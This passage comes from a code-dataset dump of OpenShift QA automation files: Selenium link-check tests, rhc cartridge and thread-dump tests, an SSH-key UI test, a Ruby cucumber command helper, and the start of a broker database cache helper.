time.sleep(2)\n web.assert_text_equal_by_xpath('''rails-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n web.go_back()\n #check the \"Drupal\" link \n web.assert_text_equal_by_xpath(\"Drupal\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[2]''')\n web.click_element_by_link_text(\"Drupal\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''drupal-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n web.go_back()\n #check the \"Wordpress\" link \n web.assert_text_equal_by_xpath(\"Wordpress\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[4]''')\n web.click_element_by_link_text(\"Wordpress\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''wordpress-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n web.go_back()\n #check the \"let us know\" link \n web.assert_text_equal_by_xpath(\"let us know\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[5]''')\n web.assert_text_equal_by_xpath(\"let us know\",'''//a[contains(@href, 'mailto:[email protected]')]''')\n\n #check the \"The Developer Center\" link \n web.assert_text_equal_by_xpath(\"The Developer Center\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[2]/a''')\n web.click_element_by_link_text(\"The Developer Center\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Developer Center''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"the User Guide\" link \n web.assert_text_equal_by_xpath(\"the User Guide\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[3]/a''')\n web.click_element_by_link_text(\"the User Guide\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''User Guide''','''//div[@id='id2789633']/div/div/div[2]/h1''') \n web.go_back()\n #check the \"JBoss\" link \n web.assert_text_equal_by_xpath(\"JBoss\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[4]/a''')\n web.click_element_by_link_text(\"JBoss\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Resources for JBoss''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"MongoDB\" link \n web.assert_text_equal_by_xpath(\"MongoDB\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[4]/a[2]''')\n web.click_element_by_link_text(\"MongoDB\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Building with MongoDB''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"see our Videos page\" link \n web.assert_text_equal_by_xpath(\"see our Videos page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[5]/a''')\n web.click_element_by_link_text(\"see our Videos page\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Videos''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n\n\n\n\n\n\n\n #check the \"community forum\" link \n web.assert_text_equal_by_xpath(\"community forum\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[2]/a''')\n web.click_element_by_link_text(\"community forum\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Forums''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"search\" link \n web.click_element_by_xpath(\"//div[@id='content']/div/div/div/div[2]/div/section/div[3]/form/button\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Search''','''//div[@id='content']/div/div/div/div/div/h1/div''') \n web.go_back()\n #check the \"Knowledge Base\" link \n web.assert_text_equal_by_xpath(\"Knowledge Base\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[3]/a''')\n web.click_element_by_link_text(\"Knowledge Base\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"FAQ\" link \n web.assert_text_equal_by_xpath(\"FAQ\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[3]/a[2]''')\n web.click_element_by_link_text(\"FAQ\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Frequently Asked Questions''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"freenode.net on channel #openshift\" link \n web.assert_text_equal_by_xpath(\"freenode.net on channel #openshift\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[4]/a''')\n web.click_element_by_link_text(\"freenode.net on channel #openshift\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connection details''','''//body/div/div/div[2]/a''') \n web.go_back()\n\n\n\n\n\n #check the \"Subscribe today\" link \n web.assert_text_equal_by_xpath(\"Subscribe today\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[3]/a''')\n web.click_element_by_link_text(\"Subscribe today\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Thanks for signing up for the OpenShift Newsletter which includes news and events, tips and tricks and other useful information concerning the OpenShift platform-as-a-service. Please provide a valid email address and click submit.''','''//body/div[2]/form/div/p''') \n web.go_back()\n #check the \"powered by open source\" link \n web.assert_text_equal_by_xpath(\"powered by open source\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a''')\n web.click_element_by_link_text(\"powered by open source\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift is Open Source''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"run on your laptop\" link \n web.assert_text_equal_by_xpath(\"run on your laptop\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a[2]''')\n web.click_element_by_link_text(\"run on your laptop\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Origin Source Code''','''//div[@id='content']/div/div/div/div/div/h1''') \n web.go_back()\n #check the \"Get involved today\" link \n web.assert_text_equal_by_xpath(\"Get involved today\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a[3]''')\n web.click_element_by_link_text(\"Get involved today\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Involved''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n\n #check the \"@openshift\" link \n web.assert_text_equal_by_xpath(\"@openshift\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[5]/a''')\n web.assert_text_equal_by_xpath('''@openshift''','''//a[@href='http://www.twitter.com/#!/openshift']''') \n #check the \"OpenShift blog\" link \n web.assert_text_equal_by_xpath(\"OpenShift blog\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[5]/a[2]''')\n web.click_element_by_link_text(\"OpenShift blog\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Blogs''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"file a bug\" link \n web.assert_text_equal_by_xpath(\"file a bug\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[6]/a''')\n web.assert_text_equal_by_xpath('''file a bug''','''//a[contains(@href, 'https://bugzilla.redhat.com/enter_bug.cgi?product=OpenShift')]''') \n web.go_back()\n\n\n\n web.delete_app(\"python\")\n\n\n \n \n self.tearDown()\n\n return self.passed(\" case_165717--CheckOpensourcePage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckOpensourcePage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165717.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.44861987233161926, "alphanum_fraction": 0.4567675292491913, "avg_line_length": 45.612403869628906, "blob_id": "67aa84b2f3a6e55679a8537964c9531634185776", "content_id": "a1b6090eb42975059b13b56eb238bcd413eb3fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6014, "license_type": "no_license", "max_line_length": 144, "num_lines": 129, "path": "/automation/open/testmodules/RT/cartridge/mysql_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nSept 24, 2012\n\n[US2105][US2110][US1386][[Runtime][cartridge]Control embedded MySQL\nhttps://tcms.engineering.redhat.com/case/167565/?from_plan=4962\n\"\"\"\n\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = '[US1386][Runtime][cartridge]Control embedded MySQL'\n \n try:\n test_name = self.get_variant()\n except:\n self.info(\"WARN: Missing OPENSHIFT_test_name, used `php` as default\")\n test_name = 'php'\n\n self.info(\"VARIANT: %s\"%test_name)\n self.app_type = common.app_types[test_name]\n self.app_name = common.getRandomString(10)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass MysqlControlEmbededCartridge(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL 5.1 cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be started',\n expect_str = [ 'MySQL is running' ])\n\n\n self.add_step(\n 'Stopping MySQL',\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be stopped',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the the stopped instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be stopped',\n expect_str = [ 'MySQL is stopped' ])\n\n self.add_step(\n 'Restarting MySQL',\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL should be started',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL should be started',\n expect_str = [ 'MySQL is running' ])\n\n self.add_step(\n 'Removing MySQL cartridge',\n \"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'The MySQL cartridge should be removed',\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlControlEmbededCartridge)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5817469954490662, "alphanum_fraction": 0.5922433733940125, "avg_line_length": 44.33064651489258, "blob_id": "d3a7210c62d64343c8dca656ecffbe1c73363eb6", "content_id": "616686555d143115ffd17089e6249ca77be95258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5621, "license_type": "no_license", "max_line_length": 208, "num_lines": 124, "path": "/automation/open/testmodules/RT/client/thread_dump.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-08-15\n\n[US2123][UI][rhc-client]threaddump for ruby-1.9 app\nhttps://tcms.engineering.redhat.com/case/177961/\n\"\"\"\nimport os\nimport common\nimport re\nimport OSConf\nimport rhtest\nimport pexpect\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `jbosseap` as default\")\n self.test_variant = 'jbosseap'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.test_variant in ('ruby', 'ruby-1.9'):\n self.str_list = ['backtrace dump', 'abstract_request_handler.rb', 'install_useful_signal_handlers', 'call', 'accept_and_process_next_request', 'main_loop', 'start_request_handler']\n elif self.test_variant in ('jbosseap', 'jbossews', 'jbossews2','jbossews-2.0'):\n self.str_list = ['ContainerBackgroundProcessor', 'ConnectionValidator', 'IdleRemover', 'server-timer', 'DestroyJavaVM', 'MSC service', 'Reference Reaper', 'Finalizer', 'Reference Handler', 'Heap']\n self.summary = \"[US2123][UI][rhc-client]threaddump for %s app\" % (self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = \"threaddump\" + common.getRandomString(4)\n self.git_repo = \"./%s\" % (self.app_name)\n self.match_rate = 0.3\n common.env_setup()\n\n def finalize(self):\n try:\n self.child.sendcontrol('c')\n except:\n pass\n\n\nclass ThreaddumpTest(OpenShiftTest):\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n scalable=self.scalable, \n disable_autoscaling=False)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Add databases to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to add mysql\")\n\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to add postgresql\")\n\n #ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mongodb\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n #self.assert_equal(ret, 0, \"Failed to add mongodb\")\n\n self.step(\"Applications must be accessed by their URL before you can take a thread dump\")\n app_url = OSConf.get_app_url(self.app_name)\n cmd = \"curl %s\" %(app_url)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Fail to access app\")\n\n self.step(\"Generate threaddump file\")\n cmd = \"rhc threaddump %s -l %s -p '%s' %s\" % ( self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Failed to generate threaddump file for %s app: %s\" % (self.app_type, self.app_name))\n self.debug(\"OUTPUT: %s\" % output)\n match = re.search(r'(?<=The thread dump file will be available via: ).*$', output, re.M)\n #match = re.search(r'(?<=rhc tail %s )-f \\S+' % (self.app_name), output)\n self.assert_not_equal(match, None, \"Failed to find command to see the threaddump file\")\n\n self.step(\"Check the threaddump file\")\n #tail_cmd = \"rhc tail %s \" % (self.app_name) + match.group(0) + \" -l %s -p '%s'\" % (self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n tail_cmd = match.group(0) + \" -l %s -p '%s'\" % (self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n print \"Command: %s\" % (tail_cmd)\n self.child = pexpect.spawn(tail_cmd)\n time.sleep(10)\n match_num = 0.0\n for s in self.str_list:\n try:\n # increase the timeout from 3 to 10\n self.child.expect(s, timeout=20)\n match_num += 1\n except pexpect.TIMEOUT:\n pass\n rate = match_num/len(self.str_list)\n if rate >= self.match_rate:\n self.info(\"Successfully matched %d%% strings in the list\" % (int(rate*100)))\n return self.passed()\n else:\n self.info(\"Only matched %d%% strings in the list. The lowest match rate is %f%%\" % (int(rate*100), int(self.match_rate*100)))\n return self.failed()\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ThreaddumpTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.645508348941803, "alphanum_fraction": 0.6573426723480225, "avg_line_length": 36.93877410888672, "blob_id": "9050766aa883dc7e008c09772c7b2a5b635889b4", "content_id": "528bfc578c7ed44b5c3f1693e8cab3204399028f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1859, "license_type": "no_license", "max_line_length": 93, "num_lines": 49, "path": "/automation/open/testmodules/UI/web/US1797_135717.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135717(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n \n def test_u_s1797135717(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user, self.cfg.password)\n #check if domain and default ssh key already exist\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n keyname='test'\n\n driver.find_element_by_link_text(\"Add a new key...\").click()\n driver.find_element_by_id(\"key_name\").clear()\n driver.find_element_by_id(\"key_name\").send_keys(keyname)\n driver.find_element_by_id(\"key_raw_content\").clear()\n driver.find_element_by_id(\"key_raw_content\").send_keys(baseutils.gen_sshkey()[1])\n driver.find_element_by_id(\"key_submit\").click()\n baseutils.wait_element_present_by_id(self, \"%s_sshkey\"%keyname)\n baseutils.assert_contain_text_by_xpath(self, keyname,\"id('%s_sshkey')/td[1]\"%keyname)\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5840548276901245, "alphanum_fraction": 0.5921115875244141, "avg_line_length": 28.17894744873047, "blob_id": "c8ea662c48f87982589cd8896c8321efff4e3f44", "content_id": "c412c30d4a2a362e98a427c0730a72a502d4244d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 8316, "license_type": "no_license", "max_line_length": 151, "num_lines": 285, "path": "/automation/open/testmodules/RT/cucumber/support/command_helper.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'timeout'\nrequire 'fileutils'\nrequire 'open3'\n\nmodule CommandHelper\n def run_stdout(cmd)\n\n exit_code = -1\n output = nil\n\n # Don't let a command run more than 5 minutes\n Timeout::timeout(500) do\n output = `#{cmd} 2>&1`\n exit_code = $?.exitstatus\n end\n\n exit_code.should == 0\n return output\n end\n\n def run(cmd, outbuf=[], retries=0)\n\n exit_code = -1\n output = nil \n # Don't let a command run more than 5 minutes\n Timeout::timeout(500) do\n output = `#{cmd} 2>&1`\n exit_code = $?.exitstatus\n end\n\n\n if exit_code != 0\n if retries < 3 && exit_code == 140 && cmd.start_with?(\"/usr/bin/rhc-\") # No nodes available... ugh\n sleep 5\n return run(cmd, outbuf, retries+1)\n end\n end\n\n # append the buffers if an array container is provided\n if outbuf\n outbuf << output\n end\n\n return exit_code\n end\n\n # run a command in an alternate SELinux context\n def runcon(cmd, user=nil, role=nil, type=nil, outbuf=nil)\n prefix = 'runcon'\n prefix += (' -u ' + user) if user\n prefix += (' -r ' + role) if role\n prefix += (' -t ' + type) if type\n fullcmd = prefix + \" \" + cmd\n\n output = `#{fullcmd} 2>&1`\n exit_code = $?.exitstatus\n\n # append the buffers if an array container is provided\n if outbuf\n outbuf << output\n end\n\n\n return exit_code\n end\n\n def rhc_create_domain(app)\n rhc_do('rhc_create_domain') do\n exit_code = run(\"#{$rhc_domain_script} create -n #{app.namespace} -l #{app.login} -p fakepw -d\")\n app.create_domain_code = exit_code\n return exit_code == 0\n end\n end\n\n def rhc_update_namespace(app)\n rhc_do('rhc_update_namespace') do\n old_namespace = app.namespace\n if old_namespace.end_with?('new')\n app.namespace = new_namespace = old_namespace[0..-4]\n else\n app.namespace = new_namespace = old_namespace + \"new\"\n end\n old_hostname = app.hostname\n app.hostname = \"#{app.name}-#{new_namespace}.#{$domain}\"\n old_repo = app.repo\n app.repo = \"#{$temp}/#{new_namespace}_#{app.name}_repo\"\n FileUtils.mv old_repo, app.repo\n `sed -i \"s,#{old_hostname},#{new_namespace},g\" #{app.repo}/.git/config`\n if run(\"grep '#{app.name}-#{old_namespace}.dev.rhcloud.com' /etc/hosts\") == 0\n run(\"sed -i 's,#{app.name}-#{old_namespace}.dev.rhcloud.com,#{app.name}-#{new_namespace}.dev.rhcloud.com,g' /etc/hosts\")\n end\n old_file = app.file\n app.file = \"#{$temp}/#{new_namespace}.json\"\n FileUtils.mv old_file, app.file\n run(\"#{$rhc_domain_script} alter -n #{new_namespace} -l #{app.login} -p fakepw -d\").should == 0\n app.persist\n end\n end\n\n def rhc_snapshot(app)\n rhc_do('rhc_snapshot') do\n app.snapshot=\"/tmp/#{app.name}-#{app.namespace}.tar.gz\"\n FileUtils.rm_rf app.snapshot\n run(\"#{$rhc_app_script} snapshot save -l #{app.login} -a #{app.name} -f '#{app.snapshot}' -p fakepw -d\").should == 0\n app.persist\n end\n end\n \n def rhc_restore(app)\n rhc_do('rhc_restore') do\n run(\"#{$rhc_app_script} snapshot restore -l #{app.login} -a #{app.name} -f '#{app.snapshot}' -p fakepw -d\").should == 0\n end\n end\n \n def rhc_tidy(app)\n rhc_do('rhc_tidy') do\n run(\"#{$rhc_app_script} tidy -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n end\n end\n\n def rhc_create_app(app, use_hosts=true)\n rhc_do('rhc_create_app') do\n cmd = \"#{$rhc_app_script} create -l #{app.login} -a #{app.name} -r #{app.repo} -t #{app.type} -p fakepw -d\"\n\n # Short circuit DNS to speed up the tests by adding a host entry and skipping the DNS validation\n if use_hosts\n run(\"echo '127.0.0.1 #{app.name}-#{app.namespace}.dev.rhcloud.com # Added by cucumber' >> /etc/hosts\")\n cmd << \" --no-dns\"\n end\n\n output_buffer = []\n exit_code = run(cmd, output_buffer)\n\n # Update the application uid from the command output\n app.update_uid(output_buffer[0])\n \n # Update the application creation code\n app.create_app_code = exit_code\n\n return app\n end\n end\n\n def rhc_embed_add(app, type)\n rhc_do('rhc_embed_add') do\n result = run_stdout(\"#{$rhc_app_script} cartridge add -l #{app.login} -a #{app.name} -p fakepw -c #{type} -d\")\n if type.start_with?('mysql-')\n app.mysql_hostname = /^Connection URL: mysql:\\/\\/(.*)\\/$/.match(result)[1]\n app.mysql_user = /^ +Root User: (.*)$/.match(result)[1]\n app.mysql_password = /^ +Root Password: (.*)$/.match(result)[1]\n app.mysql_database = /^ +Database Name: (.*)$/.match(result)[1]\n\n app.mysql_hostname.should_not be_nil\n app.mysql_user.should_not be_nil\n app.mysql_password.should_not be_nil\n app.mysql_database.should_not be_nil\n end\n\n app.embed = type\n app.persist\n return app\n end\n end\n\n def rhc_embed_remove(app)\n rhc_do('rhc_embed_remove') do\n puts app.name\n run(\"#{$rhc_app_script} cartridge remove -l #{app.login} -a #{app.name} -p fakepw -c #{app.embed} -d\").should == 0\n app.mysql_hostname = nil\n app.mysql_user = nil\n app.mysql_password = nil\n app.mysql_database = nil\n app.embed = nil\n app.persist\n return app\n end\n end\n\n def rhc_ctl_stop(app)\n rhc_do('rhc_ctl_stop') do\n run(\"#{$rhc_app_script} stop -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 0\n end\n end\n\n def rhc_add_alias(app)\n rhc_do('rhc_add_alias') do\n run(\"#{$rhc_app_script} add-alias -l #{app.login} -a #{app.name} -p fakepw --alias '#{app.name}-#{app.namespace}.example.com' -d\").should == 0\n end\n end\n\n def rhc_remove_alias(app)\n rhc_do('rhc_remove_alias') do\n run(\"#{$rhc_app_script} remove-alias -l #{app.login} -a #{app.name} -p fakepw --alias '#{app.name}-#{app.namespace}.example.com' -d\").should == 0\n end\n end\n\n def rhc_ctl_start(app)\n rhc_do('rhc_ctl_start') do\n run(\"#{$rhc_app_script} start -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 1\n end\n end\n\n def rhc_ctl_restart(app)\n rhc_do('rhc_ctl_restart') do\n run(\"#{$rhc_app_script} restart -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 1\n end\n end\n\n def rhc_ctl_destroy(app, use_hosts=true)\n rhc_do('rhc_ctl_destroy') do\n run(\"#{$rhc_app_script} destroy -l #{app.login} -a #{app.name} -p fakepw -b -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep 'does not exist'\").should == 0\n run(\"sed -i '/#{app.name}-#{app.namespace}.dev.rhcloud.com/d' /etc/hosts\") if use_hosts\n FileUtils.rm_rf app.repo\n FileUtils.rm_rf app.file\n end\n end\n\n def rhc_do(method, retries=2)\n i = 0\n while true\n begin\n yield\n break\n rescue Exception => e\n raise if i >= retries\n i += 1\n end\n end\n end\n\n #\n # useful methods to avoid duplicating effort\n #\n\n #\n # Count the number of processes owned by account with cmd_name\n #\n def num_procs acct_name, cmd_name\n\n ps_pattern = /^\\s*(\\d+)\\s+(\\S+)$/\n command = \"ps --no-headers -o pid,comm -u #{acct_name}\"\n\n stdin, stdout, stderr = Open3.popen3(command)\n\n stdin.close\n\n outstrings = stdout.readlines\n errstrings = stderr.readlines\n\n proclist = outstrings.collect { |line|\n match = line.match(ps_pattern)\n match and (match[1] if match[2] == cmd_name)\n }.compact\n\n found = proclist ? proclist.size : 0\n found\n end\n\n #\n # Count the number of processes owned by account that match the regex\n #\n def num_procs_like acct_name, regex\n command = \"ps --no-headers -f -u #{acct_name}\"\n\n stdin, stdout, stderr = Open3.popen3(command)\n\n stdin.close\n\n outstrings = stdout.readlines\n errstrings = stderr.readlines\n\n proclist = outstrings.collect { |line|\n line.match(regex)\n }.compact!\n\n found = proclist ? proclist.size : 0\n found\n end\nend\n\nWorld(CommandHelper)\n" }, { "alpha_fraction": 0.5420398116111755, "alphanum_fraction": 0.5450248718261719, "avg_line_length": 33.050846099853516, "blob_id": "39173860ea0b196c2abd72702d8b2d6020ff41ce", "content_id": "be5f5144afe3cb568dc226d88c33f31577c04a68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4020, "license_type": "no_license", "max_line_length": 86, "num_lines": 118, "path": "/automation/open/lib/brokerdb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen [email protected]\nHelper file for reading the broker's main DB (mongo)\n\"\"\"\nimport os\nimport json\nimport helper\nimport re\nimport cPickle as pickle\n\n\nclass BrokerDB(object):\n COLLECTIONS = (\"district\", \"usages\", \"user\", \"template\")\n EXPIRATION_PERIOD = 0.240 #15minutes?\n def __init__(self, dbs=\"openshift_broker_dev\", collections=[], force_cache=False):\n self.dbs=dbs\n self.collections={}\n self.force_cache = force_cache\n if not collections:\n collections = self.COLLECTIONS\n else:\n if type(collections) == str:\n collections = [collections]\n for c in collections:\n if not self._valid_cache(c) or force_cache:\n self.collections[c] = self._init_collection(c)\n self._do_cache_collection(c)\n else:\n #use cached data\n try:\n self.collections[c] = self._get_cache_collection(c)\n except:\n del(self.collections[c])\n self.collections[c] = self._init_collection(c)\n self._do_cache_collection(c)\n\n\n def _valid_cache(self, cname):\n return helper.valid_cache(self._get_cache_file(cname), \n self.EXPIRATION_PERIOD)\n\n def _get_cache_file(self, cname):\n return \"/tmp/brokerdb.%s.dump\"%cname\n\n def _do_cache_collection(self, cname):\n oldumask = os.umask(0000)\n filename=self._get_cache_file(cname)\n try:\n f = open(filename, 'wb')\n pickle.dump(self.collections[cname], f)\n 